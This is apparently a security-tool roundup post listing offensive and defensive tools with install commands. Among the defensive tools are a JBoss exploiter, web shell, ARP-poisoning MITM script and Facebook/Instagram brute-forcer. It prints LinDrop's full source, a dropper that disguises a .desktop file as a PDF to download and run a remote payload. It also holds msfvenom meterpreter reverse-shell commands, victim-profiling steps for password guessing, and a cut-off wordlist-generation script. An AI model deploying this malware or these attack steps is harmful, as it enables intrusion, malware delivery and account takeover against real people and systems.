Channel: Code Scripting – Security List Network™

ATSCAN v11.8 – Advanced Search & Dork Mass Exploit.

Changelog atscan v11.8:
* Add check for updates message.
* Add license.
* Fix uninstall process.
* Remove tool info to arguments.
* Fix E-mails scan.
* Set output to anywhere.

atscan v11.8

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libraries to install:
apt-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works on Linux platforms. Best run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux or CentOS; on Windows you can download it manually.

Examples:
Simple search:
Search: --dork [dork] --level [level]
Search + get ip: --dork [dork] --level [level] --ip
Search + get ip + server: --dork [dork] --level [level] --ip --server
Search with many dorks: --dork [dork1,dork2,dork3] --level [level]
Search + get ip+server: --dork [dorks.txt] --level [level]
Search + set save file: --dork [dorks.txt] --level [level] --save myfile.txt
Search + Replace + Exploit: --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]

Subscan from Search Engine:
Search + Exploitation: --dork [dork] --level [10] --xss/--lfi/--wp ...
Search + Server Exploitation: -t [ip] --level [10] --xss/--lfi/--wp ...
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss/--lfi/--wp ...

Validation:
Search + Exploit + Validation: --dork [dork] --level [10] --exp --isup/--valid [string]
Search + Server Exploit + Validation: -t [ip] --level [10] --exp --isup/--valid [string]
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --isup/--valid [string]

Use List / Target:
-t [target/targets.txt] --exp --isup/--valid [string]
-t [target/targets.txt] --xss/--lfi ...

Server:
Get Server sites: -t [ip] --level [value] --sites
Get Server wordpress sites: -t [ip] --level [value] --wp
Get Server joomla sites: -t [ip] --level [value] --joom
Get Server upload sites: -t [ip] --level [value] --upload
Get Server zip sites files: -t [ip] --level [value] --zip
WP Arbitrary File Download: -t [ip] --level [value] --wpadf
Joomla RFI: -t [ip] --level [1] --joomfri --shell [shell link]
Scan basic tcp (quick): -t [ip] --ports --basic tcp
Scan basic udp (quick): -t [ip] --ports --basic udp
Scan basic udp+tcp: -t [ip] --ports --basic udp+tcp
Scan complete tcp: -t [ip] --ports --all tcp
Scan complete udp: -t [ip] --ports --all udp
Scan complete udp+tcp: -t [ip] --ports --all udp+tcp
Scan range tcp: -t [ip] --ports --select tcp --start [value] --end [value]
Scan range udp: -t [ip] --ports --select udp --start [value] --end [value]
Scan range udp + tcp: -t [ip] --ports --select udp+tcp --start [value] --end [value]

Encode / Decode:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

External Command:
--dork [dork/dorks.txt] --level [level] --command "curl -v --TARGET"
--dork [dork/dorks.txt] --level [level] --command "curl -v --FULL_TARGET"
-t [target/targets.txt] --level [level] --command "curl -v --TARGET"
-t [target/targets.txt] --command "curl -v --FULL_TARGET"

Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before


create_ap v0.4 – a script that creates a NATed or Bridged WiFi Access Point.

Changelog create_ap v0.4:
+ All codescripting bug fixes.

create_ap v0.4

create_ap is a script that creates a NATed or Bridged WiFi Access Point.
Features
* Create an AP (Access Point) at any channel.
* Choose one of the following encryptions: WPA, WPA2, WPA/WPA2, Open (no encryption).
* Hide your SSID.
* Disable communication between clients (client isolation).
* IEEE 802.11n & 802.11ac support
* Internet sharing methods: NATed or Bridged or None (no Internet sharing).
* Choose the AP Gateway IP (only for ‘NATed’ and ‘None’ Internet sharing methods).
* You can create an AP on the same interface you are getting your Internet connection from.
* You can pass your SSID and password through pipe or through arguments (see examples).

create_ap v0.3

Dependencies
General
+ bash (to run this script)
+ util-linux (for getopt)
+ procps or procps-ng
+ hostapd
+ iproute2
+ iw
+ iwconfig (you only need this if ‘iw’ can not recognize your adapter)
+ haveged (optional)

For ‘NATed’ or ‘None’ Internet sharing method
– dnsmasq
– iptables

Example Use & Download from git:

git clone https://github.com/oblique/create_ap && cd create_ap
make install

ArchLinux:
yaourt -S create_ap

Gentoo:
emerge layman
layman -f -a jorgicio
emerge net-wireless/create_ap


Examples
No passphrase (open network):
create_ap wlan0 eth0 MyAccessPoint

WPA + WPA2 passphrase:
create_ap wlan0 eth0 MyAccessPoint MyPassPhrase

AP without Internet sharing:
create_ap -n wlan0 MyAccessPoint MyPassPhrase

Bridged Internet sharing:
create_ap -m bridge wlan0 eth0 MyAccessPoint MyPassPhrase

Bridged Internet sharing (pre-configured bridge interface):
create_ap -m bridge wlan0 br0 MyAccessPoint MyPassPhrase

Internet sharing from the same WiFi interface:
create_ap wlan0 wlan0 MyAccessPoint MyPassPhrase

Choose a different WiFi adapter driver
create_ap --driver rtl871xdrv wlan0 eth0 MyAccessPoint MyPassPhrase

No passphrase (open network) using pipe:
echo -e "MyAccessPoint" | create_ap wlan0 eth0

WPA + WPA2 passphrase using pipe:
echo -e "MyAccessPoint\nMyPassPhrase" | create_ap wlan0 eth0

Enable IEEE 802.11n
create_ap --ieee80211n --ht_capab '[HT40+]' wlan0 eth0 MyAccessPoint MyPassPhrase

Client Isolation:
create_ap --isolate-clients wlan0 eth0 MyAccessPoint MyPassPhrase

Download: v0.4.zip  | v0.4.tar.gz
Source: https://github.com/oblique | Our Post Before

Creak v0.0.3 – Poison, reset, spoof, redirect MITM script.

Changelog creak v0.0.3 – 2016-10-26:
* Added
ip link as ifconfig is deprecated on some distributions
* Changed
+ started porting to python 3
+ fixed some minor bugs
+ refactored a bit

creak v0.0.3

Denies navigation and download capabilities of a target host on the local network by performing an ARP poisoning attack and sending TCP reset packets for every request made to the router. Born as a didactic project for learning the Python language; I decline every responsibility for any abuse.

It requires the pcap libraries for raw packet manipulation and the dpkt module; the DNS spoofing options additionally require the dnet module from the libdnet package (not to be confused with the pydnet network evaluation tool module).

example usage creak v0.0.2

Installation:

git clone https://github.com/codepr/creak.git && cd creak
pip install -r requirements.txt
python creak.py -h

Upgrade:
git pull origin master

Source: https://github.com/codepr | Our Post Before

LinDrop – a social engineering vector for Linux targets.

Disclaimer:
All scripts/tools/software here are provided for educational purposes only. The author of any of the scripts/tools/software is in no way responsible for any misuse of the scripts/tools/software provided. In no way should you use the tools to cause any kind of damage directly or indirectly. Unauthorized use of any of the provided scripts/tools/software against a system that you do not own is illegal. Don’t be stupid.

lindrop is a .desktop file payload dropper. This script generates a zip file which contains a .desktop file masquerading as a PDF. It downloads and opens a remote PDF file, then downloads and executes a remote payload.
Useful in SE zip file situations where your targets are specifically Linux users.
Quick payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

LinDrop

Requirement:
+ Metasploit
+ Linux Operating System

Usage:

sudo apt-get install zip
git clone https://github.com/x-42/LinDrop && cd LinDrop
python lindrop.py
or copy and paste the code below:

Code:

#!/usr/bin/env python
# .desktop file payload dropper. This script generates a zip file which contains a .desktop file masquerading as a PDF. 
# Downloads and opens a remote PDF file and downloads and executes a remote payload. 
# Useful in SE zip file situation where your targets are specifically linux users.
# Quick payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload
# requires zip: apt-get install zip
import os

class color:
    g = '\033[92m'
    y = '\033[93m'
    b = '\033[0m'

print color.y + '''
 __ __           __
|  |__|.-----.--|  |.----.-----.-----.
|  |  ||     |  _  ||   _|  _  |  _  |
|__|__||__|__|_____||__| |_____|   __|
                               |__|
 by @0rbz_ (Fabrizio Siciliano)
'''

pdf_file_name = raw_input(color.y + "Output PDF file name ---> " + color.b)
output_zip_name = raw_input(color.y + "Output ZIP name ---> " + color.b)
remote_payload_url = raw_input(color.y + "Remote Payload URL ---> " + color.b)
remote_pdf = raw_input(color.y + "Remote PDF to Display to the user ---> " + color.b)


f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop", "a")
f.write("[Desktop Entry]" + "\n" + "Type=Application" + "\n" + "NoDisplay=False" + "\n" + "StartupNotify=true" + "\n" + "Icon=/usr/share/icons/gnome-colors-common/scalable/apps/x-pdf.svg" + "\n" + "Name[en_US]=" + pdf_file_name + ".pdf" + "\n" + "Terminal=false" + "\n")

f.write("\n"*1000 + """Exec=sh -c "wget 'remote_pdf' -O /tmp/temp.pdf && sh -c 'xpdf /tmp/temp.pdf &' && sh -c 'rm -rf /tmp/pl892' && sh -c 'wget remote_payload_url -O /tmp/pl892' && sh -c 'chmod +x /tmp/pl892' && sh -c '/tmp/pl892'""" + '"' + "\n")

f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop",'r')
fdata = f.read()
f.close()
new = fdata.replace("remote_payload_url", str(remote_payload_url))
f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop",'w')
f.write(new)

f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop",'r')
fdata = f.read()
f.close()
new = fdata.replace("remote_pdf", str(remote_pdf))
f = open(pdf_file_name + ".pdf" + ' '*200+ ".desktop",'w')
f.write(new)

f.close()

ex = os.system("chmod +x " + pdf_file_name +".pdf*")
tarr = os.system("tar -czf " + output_zip_name+".tar.gz " + pdf_file_name + ".pdf*")
zzip = os.system("zip " + output_zip_name +".zip " + pdf_file_name + ".pdf*" + " --quiet")
rem = os.system("rm " + pdf_file_name + ".pdf*")

print color.g + "Files " + '"' + output_zip_name + ".zip" + '"'+ " and" + ' "' + output_zip_name + ".tar.gz" + '"' " have been created and ready to send to the target." + color.b

Source: https://github.com/x-42

SysScout – A Network Forensics/Incident Response Tool.

SysScout is a fully encapsulated script that quickly and easily pulls local machine information from Linux-Based systems. A simple, easy to use Incident Response and Network Forensics tool. Unlike other scripts that require installation of dependencies and toolkits, SysScout is ready to deploy on most Linux Distros.

SysScout

Mac Forensicators NOTE: This script works for the most part on macOS, but not completely (there are some wonky exceptions). You will also need to use a directory other than /opt, as this doesn’t exist in HFS+.

Download, setup & usage:

Run these commands in a Linux-Based Terminal
git clone https://github.com/joshbrunty/SysScout /opt/SysScout/
cd /opt/SysScout/
./SysScout.sh

Source: https://github.com/joshbrunty

JexBoss v1.1.2 – JBoss verification and exploitation tool.

Changelog Jexboss v1.1.2:
* Added support for reverse shell (meterpreter, etc).
* Improvements in exploits to support complex commands with pipes and redirects (|, >, <, etc.)
* Fixes and improvements.

jexboss v1.1.2

jexboss v1.0.15

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.
Requirements
+ Python >= 2.7.x
+ urllib3

Features:
The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:
* /admin-console [ NEW ]
+-+ tested and working in JBoss versions 5 and 6
* /jmx-console
+-+ tested and working in JBoss versions 4, 5 and 6
* /web-console/Invoker
+-+ tested and working in JBoss version 4
* /invoker/JMXInvokerServlet
+-+ tested and working in JBoss versions 4 and 5

Usage:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h

Upgrade with git:
git pull origin master

Source: https://github.com/joaomatosf | Our Post Before

sqlmap v1.0.11 – Automatic SQL injection and database takeover tool.

Changelog sqlmap v1.0.11:
+ Fix several typos
+ Extra: Preventing obnoxious ‘install git’ on MacOS.
+ xml: Revisiting banner xmls (Issue #2239).
+ Bug fix for an SQL error on Android QPython (#2245)
+ txt: Unhandled exception bug fixes (#2257)

sqlmap v1.0.11

sqlmap v1.0.10

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

sqlmap has been tested on Kali Sana, Arch Linux, Ubuntu, Debian and Mac OS X.

Installation :

git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py -hh (shows the full list of options)

Update:
python sqlmap.py --update

Source : http://sqlmap.org | Our Post Before | Download: 1.0.11.zip | 1.0.11.tar.gz

Yasuo v2.3 – a Ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network.

Changelog Yasuo v2.3:
1) Accepts file with new-line separated list of IP addresses with “-l” switch.
2) Smart brute-forcing. Introduced app-specific credentials in the signature file, which are tried first.
3) Sqlite database integration. Yasuo output is now stored in a sqlite database.
4) All output and log files are now saved in “logs” directory.
5) And man there were bugs. Fixed now.

yasuo v2.3

yasuo 2.1

Yasuo is a Ruby script that scans for vulnerable 3rd-party web applications.

While working on a network security assessment (internal, external, redteam gigs etc.), we often come across vulnerable 3rd-party web applications or web front-ends that allow us to compromise the remote server by exploiting publicly known vulnerabilities. Some of the common & favorite applications are Apache Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on.

If you search through Exploit-db, there are over 10,000 remotely exploitable vulnerabilities that exist in tons of web applications/front-ends and could allow an attacker to completely compromise the back-end server. These vulnerabilities range from RCE to malicious file uploads to SQL injection to RFI/LFI etc.
Yasuo is built to quickly scan the network for such vulnerable applications thus serving pwnable targets on a silver platter.

Setup / Install

gem install ruby-nmap net-http-persistent mechanize sqlite3 text-table
git clone https://github.com/0xsauby/yasuo
cd yasuo
./yasuo.rb

Update:
git pull origin master

Details

Yasuo provides the following command-line options:

-r :: If you want Yasuo to perform port scan, use this switch to provide an IP address or IP range or an input file with new-line separated IP addresses

-f :: If you do not want Yasuo to perform port scan and already have an nmap output in xml format, use this switch to feed the nmap output

-n :: Tells Yasuo to not ping the host while performing the port scan. Standard nmap option.

-p :: Use this switch to provide port number(s)/range

-A :: Use this switch to scan all the 65535 ports. Standard nmap option.

-b [all/form/basic] :: If the discovered application implements authentication, use this switch to brute-force the auth. "all" will brute-force both form & http basic auth. "form" will only brute-force form-based auth. "basic" will only brute-force http basic auth.

-h :: Well, take a guess

Examples
./yasuo -r 127.0.0.1 -p 80,8080,443,8443 -b form
The above command will perform port scan against 127.0.0.1 on ports 80, 8080, 443 and 8443 and will brute-force login for all the applications that implement form-based authentication.

./yasuo -f my_nmap_output.xml -b all
The above command will parse the nmap output file “my_nmap_output.xml” and will brute-force login for all the applications that implement form-based and http basic authentication.

Download : Master.zip  | Clone Url
Source : https://github.com/0xsauby | Our Post Before


PyCodeInjection – Automated Python Code Injection Tool.

The PyCodeInjection project contains two main components:
1. PyCodeInjectionShell – A tool to exploit web application based Python Code Injection
2. PyCodeInjectionApp – A web application that is intentionally vulnerable to Python Code Injection

PyCodeInjection

Dependencies:
+ Python 2.7.x
+ pip
+ web.py
Platform: all operating systems supported

Usage:

windows:
python -m pip install web.py
git clone https://github.com/sethsec/PyCodeInjection && cd PyCodeInjection

Linux/Unix :
git clone https://github.com/sethsec/PyCodeInjection.git /opt/PythonCodeInjection
cd /opt/PythonCodeInjection/VulnApp
./install_requirements.txt

Source: https://github.com/sethsec

Invoke-Obfuscation v1.5 – PowerShell command and script obfuscator.

Changelog Invoke-Obfuscation v1.5 – 2016-11-04:
* BlueHat: Added WMIC LAUNCHER with some randomization of WMIC command line arguments.

Purpose:
Attackers and commodity malware have started using extremely basic obfuscation techniques to hide the majority of the command from the command line arguments of powershell.exe. I developed this tool to aid the Blue Team in simulating obfuscated commands based on what I currently know to be syntactically possible in PowerShell 2.0-5.0 so that they can test their detection capabilities of these techniques.

Invoke-Obfuscation v1.5

The tool’s sole purpose is to break any assumptions that we as defenders may have concerning how PowerShell commands can appear on the command line. My hope is that it will encourage the Blue Team to shift to looking for Indicators of Obfuscation on the command line in addition to updating PowerShell logging to include Module, ScriptBlock and Transcription logging as these sources simplify most aspects of the obfuscation techniques generated by this tool.

Usage:

git clone https://github.com/danielbohannon/Invoke-Obfuscation && cd Invoke-Obfuscation
Open PowerShell
cd [Your Path]
Import-Module ./Invoke-Obfuscation.psm1
Invoke-Obfuscation

Upgrade:
git pull origin master

Source: https://github.com/danielbohannon

v3n0M v410.4 – Popular Pentesting scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns.

Latest Change v410.4:
+ Latest News: Updated Recovery Menu, Minor Bugfixes.
+ Fixed/Added/Implemented Cloudflare resolver.
+ dnspython in setup.py addressed.

v3n0m-scanner v410.4

V3n0M is a free and open source scanner. Evolved from baltazar’s scanner, it has adopted several new features that improve functionality and usability. It is mostly experimental software.

Features: 
* SQli-Dorker XSS&LFI>RCE DNS-Bruteforcer.
* Cloudflare-Resolver FTP-Crawler AdminPage-Finder.

This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.
Very useful for executing:
* Metasploit Modules Scans
* LFI, RFI and XSS Scanning[LFI/RFI/XSS]
* SQL Injection Vuln Scanner[SQLi]
* Extremely Large D0rk Target Lists
* FTP Crawler
* DNS BruteForcer
* Python3.5 Asyncio based scanning

What You Hold:
The official adoption of darkd0rker heavily recoded, updated, expanded and improved upon
* Brand new, just outta the box!
* Largest and most powerful d0rker online, 18k+d0rks searched over ~ Engines at once.
* Free and Open /src/
* CrossPlatform Python based toolkit
* Version 4.0.6 Released on 14th August 2016
* Licensed under GPLv2
* Tested on: ArchLinux 4.4.6-1, Ubuntu, Debian, Windows, MacOS

Installation & Usage from git:

git clone https://github.com/v3n0m-Scanner/V3n0M-Scanner && cd V3n0M-Scanner
sudo pip3 install dnspython3 aiohttp httplib2 socksipy-branch requests url
python3 setup.py
cd src
python3 v3n0m.py

Update:
cd V3n0M-Scanner
git pull origin master

Download: V.4.0.6.zip  | V.4.0.6.tar.gz
Source: https://github.com/v3n0m-Scanner | Our Post Before

PowerShell Rapid Response (PoSH-R2) – For the incident responder.

PoSH-R2 is a set of Windows Management Instrumentation interface (WMI) scripts that investigators and forensic analysts can use to retrieve information from a compromised (or potentially compromised) Windows system. The scripts use WMI to pull this information from the operating system. Therefore, this script will need to be executed with a user that has the necessary privileges.

PoSh-R2

PoSH-R2 will retrieve the following data from an individual machine or a group of systems:
– Autorun entries
– Disk info
– Environment variables
– Event logs (50 latest)
– Installed Software
– Logon sessions
– List of drivers
– List of mapped network drives
– List of running processes
– Logged in user
– Local groups
– Local user accounts
– Network configuration
– Network connections
– Patches
– Scheduled tasks with AT command
– Shares
– Services
– System Information

Usage:

git clone https://github.com/WiredPulse/PoSh-R2 && cd PoSh-R2
./PoSH_R2.ps1

Source: https://github.com/WiredPulse

BenchIT is a simple Python script for security auditing purposes.

BenchIT is a simple Python script for security auditing purposes. It is the most useful for auditing systems by analyzing files collected from remote hosts. It allows you to check certain system settings stored in configuration files by using regular expressions. The simplest check will determine if a pattern matches. However, with capturing groups it is also possible to determine whether the actual value matches the expected or the default value. Results are summarized in a HTML report and also stored in a CSV file.

BenchIT

Regular expressions must be stored in a CSV file containing the following columns separated by a semicolon (;):
* Boolean value which determines whether we expect a match or not (“True”).
* Name of the file (“sshd_config”).
* Regular expression to evaluate (“^Protocol[ \t]+(\d)$”).
* Number of the chapter in the given CIS guideline (“9.2.1”).
* Title of the chapter in the given CIS guideline (“Set SSH Protocol to 2”).
* Short summary of the chapter (“SSH supports two different protocols…”).
* Default value of the setting (“2,1”).
* Expected value of the setting (“2”).

System requirements:
– GnuWin32 with ports of the necessary tools
++ http://getgnuwin32.sourceforge.net/
– Q to execute SQL-like queries on CSV files
++ http://harelba.github.io/q/
– The following Python libraries:
++ dominate, configobj

Use and download from git:

git clone https://github.com/sgabe/benchit && cd benchit
python benchit.py -h

Source: https://github.com/sgabe/benchit

brut3k1t – Server side brute force module.

brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The protocols that are currently complete and supported are:
+ ssh
+ ftp
+ smtp
+ XMPP
+ instagram
+ facebook

brut3k1t

KEY NOTES TO REMEMBER:
* If you do not supply the port -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um… web-based. 🙂
* If you do not supply the delay -d flag, the default delay in seconds will be 1.
* Remember, use the SMTP server address and XMPP server address for the address -a flag, when cracking SMTP and XMPP, respectively.
* Facebook requires the username ID. This is a little bit of a setback since some people do not display their ID publicly on their profile.
* Make sure the wordlist and its directory is specified. If it is in /usr/local/wordlists/wordlist.txt specify that for the wordlist -w flag.
* Remember that some services are not running on their default port. An FTP server will not necessarily always be on port 21. Please keep that in mind.
* Use this for educational and ethical hacking purposes, as well as the sake of learning code and security-oriented practices. No script kiddies!

Use & download:

git clone https://github.com/ex0dus-0x/brut3k1t && cd brut3k1t
pip install -r requirements.txt
./brut3k1t.py

Cracking Facebook is quite a challenge, since you will require the target user ID, not the username:
python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt

Cracking Instagram with username test, wordlist wordlist.txt and a 5 second delay:
python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5

Source: https://github.com/ex0dus-0x

Scout2 v2.0.0rc7 – Security auditing tool for AWS environments.

Scout2 is a security tool that lets AWS administrators assess their environment’s security posture. Using the AWS API, Scout2 gathers configuration data for manual inspection and highlights high-risk areas automatically. Rather than poring through dozens of pages on the web, Scout2 supplies a clear view of the attack surface automatically.

Note: Scout2 is stable and actively maintained, but a number of features and internals may change. As such, please bear with us as we find time to work on, and improve, the tool. Feel free to report a bug with details, request a new feature, or send a pull request

Scout2 v2.0.0rc7

Changelog Scout2 v2.0.0rc7:
* use opinel v1.0.2 which fixes reading role credentials on EC2 instance.
* A few new rules, tweak older rules, and more filters-related code.
* Make sure non zero is returned upon failure of opinel import.
* bug fixes

Requirements:
+ Python version: 2.7, 3.3, 3.4, 3.5
+ AWS Credentials
To run Scout2, you will need valid AWS credentials (Access Key). The role, or user account, associated with this Access Key requires read-only access for all resources in a number of services, including but not limited to CloudTrail, EC2, IAM, RDS, Redshift, and S3.
+ Compliant with AWS’ Acceptable Use Policy
Use of Scout2 does not require AWS users to complete and submit the AWS Vulnerability / Penetration Testing Request Form. Scout2 only performs AWS API calls to fetch configuration data and identify security gaps, which is not considered security scanning as it does not impact AWS’ network and applications.
+ All Operating System Support.

Use and Download:

git clone https://github.com/nccgroup/Scout2 && cd Scout2
pip install -r requirements.txt
python setup.py install
python Scout2.py --help

For Update:
python Scout2.py --update

Download Latest Stable version: v2.0.0rc7.zip  | v2.0.0rc7.tar.gz
Source: https://github.com/nccgroup


WePWNise is a proof-of-concept Python script that generates independent VBA code for injection into MS Office documents.

wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.
Prerequisites
* Python termcolor package. To install run: pip install termcolor
* Metasploit Framework.

wepwnise

wePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.

In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the --msg parameter. To disable this functionality set the --msgbox parameter to False.

Due to performance conditions that may be introduced as a result of long SRP/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored, and checks these first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SRP/EMET policies as defined within the Registry and make its injection choice purely based on the retrieved information.

Usage & Download:

git clone https://github.com/mwrlabs/wePWNise && cd wePWNise
pip install termcolor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw

Source: https://labs.mwrinfosecurity.com/tools/wepwnise/

smod v1.0.4 – MODBUS Penetration Testing Framework.

Changelog smod v1.0.4 11/11/2016:
* Update writeAllCoils.py
* Create writeAllRegister.py
* Update System/Core/Global.py

smod v1.0.4

smod v1.0.3

smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest the Modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. This software can be run on Linux/OSX under Python 2.7.x.

smod v1.0.2

Summary
SCADA (Process Control Networks) based systems have moved from proprietary closed networks to open source solutions and TCP/IP enabled networks steadily over recent years. This has made them vulnerable to the same security vulnerabilities that face our traditional computer networks.
The Modbus/TCP protocol was used as the reference protocol to display the effectiveness of the test bed in carrying out cyber attacks on a power system protocol. Modbus/TCP was chosen specifically for these reasons:
+ modbus is still widely used in power systems.
+ modbus/TCP is simple and easy to implement.
+ modbus protocol libraries are freely available for utilities to implement smart grid applications.
You can use this tool to perform a vulnerability assessment of a Modbus deployment.

Installation & usage:

git clone https://github.com/enddo/smod && cd smod
python smod.py

Update:
cd smod
git pull origin master

Source : https://github.com/enddo | Our Post Before | Download old stable version: v1.0.3.tar.gz | v1.0.3.zip

AutOSINT – automates common checks made during open source intelligence gathering engagements.

Changelog AutOSINT v0.1
+ Update leak.txt
+ Update potfile.txt
+ Update Requirements, AutOSINT.py & Dependencies.

AutOSINT automates some of the common things checked during open source intelligence gathering engagements.

AutOSINT v0.1

Features:
* poll various OSINT sources for data, write to .doc
* whois – added
* dns – added
* shodan – added
* scrape pastebin, etc
* google dorks via googlesearch
* BGP info
* AS info
* linkedin (from Nick)
* Pyfoca; Google to discover files with extensions such as .pdf, .xls, .doc, etc.
* Email, Domain and People Harvester.

Dependencies:
+ Pyfoca uses Google to discover files with extensions such as .pdf, .xls, .doc, etc. and downloads them. https://github.com/altjx/ipwn
+ theHarvester: e-mail, subdomain and people-name harvester. https://github.com/laramies/theHarvester

Usage and Download from source:

git clone https://github.com/bharshbarger/AutOSINT && cd AutOSINT
pip install -r requirements.txt
Make sure all dependencies are installed and on your PATH.

python AutOSINT.py -h

Upgrade:
git pull [Note: Best run on Kali 2.0 to 2016.3 rolling]

Source: https://github.com/bharshbarger | Old Post Here

Attack Shell is a PHP remote shell, basically used for remote access and security pentesting.


Note: This software is intended for demonstration and learning purposes only. The author is not responsible for any damage it may cause, and the user holds full responsibility for his/her actions.

Introduction
Attack Shell a.k.a. Ani-Shell is a simple PHP shell with some unique features such as a Mass Mailer, a simple Web-Server Fuzzer, a Dosser, Back Connect, Bind Shell, Auto Rooter, etc. This shell has immense capabilities and has been written with some coding standards in mind for easier editing and customization.

Attack Shell a.k.a. Ani-Shell

Features
* Shell
* Intelligent File Manager
* Auto Rooter
* PHP Obfuscate
* Platform Independent
* Mass Mailer
* Small Web-Server Fuzzer
* Dosser
* Design
* Secure Login
* Deletion of Files
* Bind Shell
* Back Connect
* Fixed Some Coding errors!
* Rename Files
* Encoded Title
* Traceback (Email Alerts)
* PHP Evaluate
* Better Command Execution (supports older version of PHP)
* Mass Code Injector (Appender and Overwriter)
* Lock Mode Customization
* Mail Bomber (With Less Spam detection feature)
* PHP Decoder
* Anti-Crawler Feature
* MD5 Hash Cracker
* Python Bind-Shell

Customization
1. Email Traceback is set to off by default, so no emails are sent. If you turn this feature on, make sure you change the default email address (franzwagner.str@gmail.com) to your own. Please change it before using!
2. Username and password are set to admin and 12345687 respectively; change them for better security.
3. The Lock Mode feature is set to on. This should not be changed unless you want your shell exposed.
4. The Anti-Crawler feature is set to off. Change it to on for anti-crawler support.
5. A variable named greetings can be changed to alter the shell's greeting message.
Usage and Download from source:

git clone https://github.com/Strund3r/Attack-Shell
copy the files into the web root of LAMP (Linux) / XAMPP (Windows)

Run in a local Docker Container
Run on terminal:
$ docker run -d --name attack-shell strund3r/attack-shell

If you want to use a php.ini, change the Dockerfile to:

FROM php:7.0-apache

MAINTAINER Franzwagner Ternus <franzwagner.str@gmail.com>

COPY config/php.ini /usr/local/etc/php/
COPY . /var/www/html

Where config/ is the directory containing your php.ini file.

Default Login
Username: admin
Password: 12345687

Source: https://github.com/Strund3r

Pwdlogy – a wordlist generating tool for social engineers and security researchers.


Disclaimer: Please do not use in military or secret service organizations, or for illegal purposes. This tool is for educational purposes only. I will not be held responsible for any illegal activities conducted with it.
Pwdlogy – a victim-profile-based wordlist generating tool for social engineers and security researchers!

pwdlogy

How to Use
1. Find out the victim's name, username, hobbies, sports team, favourite food, and anything else you can learn about him/her that might appear in the password.
2. Find out as much as possible about his/her pets, family and friends (their names, birthdays, and any keyword that might appear in the password).
3. Place all the keywords (not the birthdays) into the keywords.txt file, one keyword per line.
4. Place all the birthdays into the birthday.txt file, one per line, in the format DDMMYYYY.
5. If you are fairly new to this tool, enter start and open the gen.txt file (or whatever file you configured in the settings) to see the generated wordlist. Go to step 8.
6. If you wish to use custom settings, use the custom command and follow the instructions displayed. Edit the custom formats file and, when you are done, run the start command to begin generating the wordlist.
7. Check the gen.txt file to see the generated wordlist.
8. The generated wordlist contains possible passwords for your victim. Use it with any password cracker. Good luck!
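The procedure above in code, as an added example written for this page (it is not pwdlogy's own generator): it takes the same two inputs, a keyword list and DDMMYYYY birthdays, expands each keyword into case and leet variants, combines them with the date fragments people actually type (full year, two-digit year, day+month, DDMMYY, DDMMYYYY) and a few common suffixes, and optionally glues pairs of keywords together (pet name + child name). The profile data is constructed, and the variant rules, suffix list and pairing are my own assumptions; replace the two lists with the contents of keywords.txt and birthday.txt.

```python
import itertools

# Constructed sample profile (stands in for keywords.txt and birthday.txt; not real data)
KEYWORDS = ["alice", "rex", "dolphins"]
BIRTHDAYS = ["03071990"]          # DDMMYYYY, the format birthday.txt expects

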